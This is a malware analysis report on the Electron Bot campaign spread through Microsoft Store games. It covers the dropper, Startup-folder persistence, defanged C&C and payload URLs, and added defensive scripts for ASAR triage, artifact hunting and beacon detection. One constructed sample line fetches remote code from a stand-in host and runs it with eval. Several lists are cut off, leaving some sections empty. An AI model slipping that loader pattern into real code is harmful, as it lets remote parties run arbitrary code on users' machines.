Check Point Research (CPR) has spotted new malware that is actively being distributed through Microsoft's official store. With over 5,000 machines already affected, the malware continually executes attacker commands,
such as controlling social media accounts on Facebook, Google and SoundCloud. The malware can register new accounts, log in, and comment on and "like" other posts.
CPR has reported to Microsoft all detected game publishers that are related to this campaign.
Research by: Moshe Marelus
CPR researchers detected a new malware, dubbed Electron Bot, which has infected over 5,000 active machines worldwide. CPR chose the name after the C&C domain used in the latest campaign, Electron-Bot[.]s3[.]eu-central-1[.]amazonaws[.]com.
Electron Bot is a modular SEO poisoning malware, which is used for social media promotion and click fraud. It is mainly distributed via the Microsoft store platform and dropped from dozens of infected applications, mostly games, which are constantly uploaded by the attackers.
Figure 1: VirusTotal score
The attackers’ activity began as an ad clicker campaign discovered at the end of 2018. The malware in question was hiding in the Microsoft store as an app called “Album by Google Photos” which claimed to be published by Google LLC.
The malware has evolved steadily over the years as the attackers added new features and techniques to its arsenal.
To avoid detection, most of the scripts controlling the malware are loaded dynamically at run time from the attackers’ servers. This enables the attackers to modify the malware’s payload and change the bots’ behavior at any given time.
Electron Bot's main capabilities are:
In addition, the malware's payload contains functions that control social media accounts on Facebook, Google and SoundCloud. It can register new accounts, log in, and comment on and "like" other posts.
The malware uses the Electron framework to imitate human browsing behavior and evade website protections.
Figure 2: The infection chain
The infection chain follows a pattern common to such campaigns: it starts with the installation of an infected application downloaded from the Microsoft Store.
The campaign begins when a user downloads one of the infected applications from the legitimate Microsoft store. To demonstrate, CPR used the game “Temple Endless Runner 2”, which was published on September 6, 2021 and has close to one hundred reviews.
Figure 3: Temple Endless Runner 2
When the game is downloaded, the application package (APPX) is installed in the following directory: "C:\program files\windowsapps\16925JeuxjeuxjeuxGames.TempleRun2TakeTheIdolIfYouD_188.8.131.52_x64__66k318ytnjhfe\app"
Figure 4: The game folder
The game is built with Electron, so most of the files in the folder belong to the Electron framework. The executable "app.exe" is the Electron runtime itself (renamed); it loads and runs the scripts located in the resources folder.
The resources folder holds a file named "app.asar". ASAR is the archive format Electron uses to package an application's source code; Electron reads the scripts directly out of the archive at run time, so the source is not unpacked to disk during normal execution.
In this analysis, the researchers used the "ASAR 7zip extension" to extract the source code from "app.asar". The official command-line tool does the same with `asar extract app.asar <output-dir>`.
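The ASAR layout is simple enough to parse by hand, which is useful when the archive is damaged or when a plugin is not available. The following reader is an added example written for this page, not code from the game or from Electron: it parses the two Chromium Pickle structures at the start of the archive (a uint32 giving the header size, then a length-prefixed JSON string padded to 4 bytes), walks the JSON file tree, slices each file out of the body, and lists every http(s) URL referenced by the extracted scripts, which is the first question to ask of an app whose payload is fetched at run time. `build_asar` exists only so the example runs offline against a constructed two-file sample; the file names and the example.invalid URL in that sample are assumptions, not content of the real game.

```python
"""Read (and, for an offline sample, write) Electron ASAR archives to triage app.asar."""
import json
import re
import struct

URL_RE = re.compile(rb"https?://[^\s'\"`)]+")


def _pad4(n: int) -> int:
    """Chromium's Pickle pads each payload to a 4-byte boundary."""
    return (n + 3) & ~3


def build_asar(files: dict) -> bytes:
    """Pack {path: bytes} into an ASAR archive (nested directories via '/').

    Present only so the example runs offline; it emits the layout Electron's
    own asar tool uses for ordinary (not 'unpacked') files.
    """
    tree = {"files": {}}
    blobs, offset = [], 0
    for path, data in files.items():
        node = tree
        *dirs, name = path.split("/")
        for d in dirs:
            node = node["files"].setdefault(d, {"files": {}})
        node["files"][name] = {"size": len(data), "offset": str(offset)}
        blobs.append(data)
        offset += len(data)
    header = json.dumps(tree).encode()
    # Pickle 2: uint32 string length + JSON, padded; pickle 1: uint32 size of pickle 2.
    string_payload = struct.pack("<I", len(header)) + header.ljust(_pad4(len(header)), b"\0")
    header_pickle = struct.pack("<I", len(string_payload)) + string_payload
    return struct.pack("<II", 4, len(header_pickle)) + header_pickle + b"".join(blobs)


def read_header(data: bytes):
    """Parse the ASAR header; return (tree, base) with base = offset of the first file body."""
    if len(data) < 16:
        raise ValueError("too short to be an ASAR archive")
    size_len, header_size, payload_len, json_len = struct.unpack_from("<IIII", data, 0)
    if size_len != 4 or payload_len + 4 != header_size or 16 + json_len > len(data):
        raise ValueError("inconsistent ASAR header")
    return json.loads(data[16:16 + json_len]), 8 + header_size


def walk(tree: dict, prefix: str = ""):
    """Yield (path, entry) for every file entry, depth-first, in header order."""
    for name, entry in tree.get("files", {}).items():
        if "files" in entry:
            yield from walk(entry, prefix + name + "/")
        else:
            yield prefix + name, entry


def extract_all(data: bytes) -> dict:
    """Return {path: bytes}; 'unpacked' entries live in app.asar.unpacked/ and yield None."""
    tree, base = read_header(data)
    out = {}
    for path, entry in walk(tree):
        if entry.get("unpacked"):
            out[path] = None
            continue
        start = base + int(entry["offset"])
        end = start + int(entry["size"])
        if end > len(data):
            raise ValueError(f"{path}: entry points outside the archive")
        out[path] = data[start:end]
    return out


def remote_urls(files: dict) -> list:
    """Every http(s) URL referenced by an extracted .js file, sorted and de-duplicated."""
    found = set()
    for path, body in files.items():
        if body and path.endswith(".js"):
            found.update(m.decode(errors="replace") for m in URL_RE.findall(body))
    return sorted(found)


# Constructed sample app (assumed names, not the real game's code): a loader that
# fetches a remote config and evaluates what comes back.
SAMPLE_FILES = {
    "main.js": b"const cfg = 'https://example.invalid/config.json';\nrequire('./scripts/loader')(cfg);\n",
    "scripts/loader.js": b"module.exports = u => fetch(u).then(r => r.text()).then(eval);\n",
}
SAMPLE_ASAR = build_asar(SAMPLE_FILES)

if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_ASAR
    files = extract_all(blob)
    for path, body in files.items():
        print(f"{path:40} {'(unpacked)' if body is None else len(body)}")
    print("remote URLs:", remote_urls(files))
```

Run it as `python asar_triage.py app.asar` to list the archive's contents and remote references. The offset/size checks matter on real samples: a crafted header whose offsets point past the end of the file is a common way for a packed app to break naive extractors, and a `None` entry tells you to look beside the archive in `app.asar.unpacked` rather than inside it.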
Figure 5: The source code folder
The game is loaded by launching the main script “main.js” which is responsible for basic window initialization and downloading a configuration file from hxxps://s3[.]eu-west-1[.]amazonaws[.]com/jeuxjeuxjeux.files/json-obj-el12/templeendlessrunner2.json.
Figure 6: templeendlessrunner2.json
The configuration file includes links to external scripts needed to run the game.
Here is a summary of the main keys:
After all scripts are launched, users can play the game.
The Dropper – “serviceScript”:
The dropper first checks whether an antivirus product is installed on the machine, comparing what it finds against a hardcoded list of antivirus products; if one is detected, the script stops executing.
Figure 7: Anti-virus detection
Next, the dropper downloads "112942.png" from hxxps://mediafire[.]com/file/3v4vlgsi1ve53ya/112942.png. Despite the extension, the file is a ZIP archive; the mismatch between format and extension is most likely there to make the download look less suspicious. The archive is extracted to the following directory: "C:\users\<username>\appdata\local\packages\microsoft.windows.securityupdate_cw5n1h2txyewy"
Figure 8: The bot folder
The dropped folder has the same structure as the game package first downloaded from the Microsoft Store: it is also an Electron app, and its source code is likewise loaded dynamically from an external domain.
In the dropped resources folder there is a file named "app" with no extension. The dropper renames it to "app.asar", the name Electron expects for the packed source archive (and the same file name the infected game carries). This is probably done so that the bot does not run unless the dropper installed it properly.
Finally, the dropper creates a shortcut (.lnk) to "Windows Security Update.exe" in the dropped folder and places it in the user's Startup folder to gain persistence.
Once installed and persisted, the bot starts automatically at the next logon.
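The dropper stage above leaves three things on disk that a responder can look for: the package folder under %LOCALAPPDATA%\Packages, a Startup shortcut that points at "Windows Security Update.exe", and a downloaded file with a .png extension that actually starts with the ZIP magic bytes. The script below is an added example written for this page, not CPR's tooling: `hunt()` takes a user profile directory and returns those findings. It assumes the shortcut went into the per-user Startup folder, that the Electron layout uses a `resources` subfolder, and that a leftover "112942.png" would sit in Downloads or %LOCALAPPDATA%\Temp (the page does not say where it is saved). The .lnk check is a heuristic string search (shell links store the target as ANSI and/or UTF-16LE), not a full ShellLink parse. `demo()` builds a constructed infected profile in a temporary directory so the check runs offline.

```python
"""Hunt a user profile for the on-disk artifacts of the Electron Bot dropper."""
import os
import tempfile

DROP_DIR = os.path.join("AppData", "Local", "Packages",
                        "microsoft.windows.securityupdate_cw5n1h2txyewy")
# Assumption: the shortcut lands in the per-user Startup folder.
STARTUP_DIR = os.path.join("AppData", "Roaming", "Microsoft", "Windows",
                           "Start Menu", "Programs", "Startup")
BOT_EXE = "Windows Security Update.exe"
ZIP_MAGIC = b"PK\x03\x04"
# Assumption: where a ZIP-as-PNG download is most likely to be left behind.
DOWNLOAD_DIRS = ["Downloads", os.path.join("AppData", "Local", "Temp")]


def _mentions_bot_exe(lnk_bytes: bytes) -> bool:
    """Heuristic: a .lnk carries its target path as ANSI and/or UTF-16LE text."""
    return (BOT_EXE.encode("ascii") in lnk_bytes
            or BOT_EXE.encode("utf-16-le") in lnk_bytes)


def hunt(profile: str) -> list:
    """Return human-readable findings for one user profile directory."""
    findings = []
    drop = os.path.join(profile, DROP_DIR)
    if os.path.isdir(drop):
        findings.append(f"drop folder present: {drop}")
        # 'resources' is Electron's standard folder name for app.asar (assumed here).
        for rel in (BOT_EXE, os.path.join("resources", "app.asar")):
            if os.path.exists(os.path.join(drop, rel)):
                findings.append(f"bot component present: {os.path.join(drop, rel)}")
    startup = os.path.join(profile, STARTUP_DIR)
    if os.path.isdir(startup):
        for name in os.listdir(startup):
            path = os.path.join(startup, name)
            if name.lower().endswith(".lnk") and os.path.isfile(path):
                with open(path, "rb") as f:
                    if _mentions_bot_exe(f.read()):
                        findings.append(f"persistence shortcut: {path}")
    for sub in DOWNLOAD_DIRS:
        folder = os.path.join(profile, sub)
        if not os.path.isdir(folder):
            continue
        for name in os.listdir(folder):
            path = os.path.join(folder, name)
            if name.lower().endswith(".png") and os.path.isfile(path):
                with open(path, "rb") as f:
                    if f.read(4) == ZIP_MAGIC:
                        findings.append(f"ZIP disguised as PNG: {path}")
    return findings


def demo() -> list:
    """Build a constructed infected profile (sample data, not a real capture) and hunt it."""
    with tempfile.TemporaryDirectory() as profile:
        drop = os.path.join(profile, DROP_DIR)
        os.makedirs(os.path.join(drop, "resources"))
        for rel in (BOT_EXE, os.path.join("resources", "app.asar")):
            with open(os.path.join(drop, rel), "wb"):
                pass
        startup = os.path.join(profile, STARTUP_DIR)
        os.makedirs(startup)
        # Fake .lnk: real ones begin with header size 0x4C; only the embedded target matters here.
        with open(os.path.join(startup, "Windows Security Update.lnk"), "wb") as f:
            f.write(b"L\x00\x00\x00" + BOT_EXE.encode("utf-16-le"))
        downloads = os.path.join(profile, "Downloads")
        os.makedirs(downloads)
        with open(os.path.join(downloads, "112942.png"), "wb") as f:
            f.write(ZIP_MAGIC + b"\x00" * 26)          # ZIP local-file header, .png name
        with open(os.path.join(downloads, "real.png"), "wb") as f:
            f.write(b"\x89PNG\r\n\x1a\n")              # genuine PNG signature: must not fire
        return hunt(profile)


if __name__ == "__main__":
    target = os.path.expanduser("~")   # on Windows: C:\Users\<username>
    for line in hunt(target) or ["no Electron Bot artifacts found"]:
        print(line)
```

On a live machine run it as the affected user (or pass each profile under C:\Users in turn). A hit on the drop folder is the strong signal; the .png check is deliberately broad and will also flag any other ZIP renamed to .png, so treat it as a lead to inspect, not a verdict.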
The Bot – “Windows Security Update.exe”:
Figure 9: windowsdef.js
"windowsdef.js" downloads "main.js", the script that actually contains all of the malware's capabilities. It is hosted on the C&C server at Electron-Bot[.]s3[.]eu-central-1[.]amazonaws[.]com/js/main.js.
The bot is designed to imitate the following user behavior:
Figure 10: “Human” mouse moving function
After getting its dynamic payload, the malware downloads a configuration file from 11k[.]online/textFileProm.json.
Figure 11: The configuration file
In each configuration file, some commands carry a 'countries' list; such a command is executed only if the infected machine's geolocation appears in that list.
Figure 12: Command types
Figure 13: The bot's hardcoded YouTube comments
Figure 14: MITRE ATT&CK used techniques
Figure 15: mediafire[.]com showing the upload came from Bulgaria
Figure 16: Bulgaria is the main promoted country
Conclusion and Safety Tips:
Although the bot does not currently perform high-risk actions on the infected machine, it is important to be aware of what it could do.
This research analyzed a new malware called Electron Bot that has infected more than 5,000 victims globally. Electron Bot reaches machines through certain apps downloaded from the official Microsoft Store. An Electron app runs with the full privileges of the user who launched it and, through Node.js, can reach the machine's resources, including the GPU. Because the bot's payload is loaded dynamically on every run, the attackers can modify the code and turn the bot's behavior into something far riskier at any time; for example, they could stage a second payload and drop other malware such as ransomware or a RAT, all without the victim's knowledge.
Because most people assume that app-store listings and reviews can be trusted, they do not hesitate to download applications from there. CPR researchers warn that this carries real risk, and all users should follow a few safety tips when downloading applications:
In order to clean already infected machines, CPR advises users to follow these steps:
Check Point protections:
The Electron Bot campaign was first detected by our XDR product. The detection combined the suspicious network activity of a periodic bot (regular, evenly spaced connections to the same host) with endpoint malware behavior.
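The network half of that detection can be reproduced from a plain proxy or flow log. The script below is an added example for this page, not Check Point's detection logic: it groups connections by (source host, destination host), computes the gaps between consecutive connections, and flags pairs whose gaps are nearly constant (coefficient of variation of the gaps below a threshold), which is what a bot polling its configuration on a timer looks like. The log lines are constructed sample data with assumed host names; the path name echoes the configuration file mentioned above but the host is not the real one.

```python
"""Flag periodic outbound connections (beaconing) in a proxy/flow log."""
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample log (not a real capture): ISO time, source host, destination host, path.
# ws-17 browses normally and, every ~5 minutes, polls config.example.test (assumed name).
SAMPLE_LOG = """\
2022-02-01T10:00:00 ws-17 cdn.example.test /img/1.png
2022-02-01T10:00:03 ws-17 config.example.test /textFileProm.json
2022-02-01T10:01:11 ws-17 news.example.test /
2022-02-01T10:05:04 ws-17 config.example.test /textFileProm.json
2022-02-01T10:07:40 ws-17 cdn.example.test /img/2.png
2022-02-01T10:10:02 ws-17 config.example.test /textFileProm.json
2022-02-01T10:15:05 ws-17 config.example.test /textFileProm.json
2022-02-01T10:18:21 ws-17 news.example.test /sports
2022-02-01T10:20:03 ws-17 config.example.test /textFileProm.json
2022-02-01T10:25:04 ws-17 config.example.test /textFileProm.json
2022-02-01T10:31:55 ws-17 cdn.example.test /img/3.png
2022-02-01T10:30:02 ws-17 config.example.test /textFileProm.json
"""


def parse_log(text: str) -> dict:
    """Group connection timestamps by (src, dst); lines need not be in time order."""
    events = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, _path = line.split(maxsplit=3)
        events[(src, dst)].append(datetime.fromisoformat(ts))
    return events


def detect_beacons(text: str, min_events: int = 5, max_cv: float = 0.15) -> dict:
    """Return {(src, dst): stats} for pairs whose inter-connection gaps are nearly constant.

    max_cv is the tolerated jitter: stdev(gaps) / mean(gaps). Bots that add random
    sleep need a looser value; a tighter one cuts false positives from chatty sites.
    """
    hits = {}
    for key, times in parse_log(text).items():
        if len(times) < min_events:
            continue                       # too few samples to call anything periodic
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue                       # duplicate timestamps, not a timer
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            hits[key] = {"connections": len(times),
                         "period_s": round(mean),
                         "jitter_cv": round(cv, 3)}
    return hits


if __name__ == "__main__":
    for (src, dst), stats in detect_beacons(SAMPLE_LOG).items():
        print(f"{src} -> {dst}: every ~{stats['period_s']}s "
              f"x{stats['connections']} (jitter cv {stats['jitter_cv']})")
```

Periodicity alone is not proof: software updaters and mail clients beacon too, which is why the original detection also required endpoint malware behavior. The value of the network signal is that it survives a payload swap: the bot can change what main.js does, but as long as it keeps polling the configuration host on a timer, the cadence stays visible.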
Related game publishers:
Crazy 4 games
Malware hosting sites: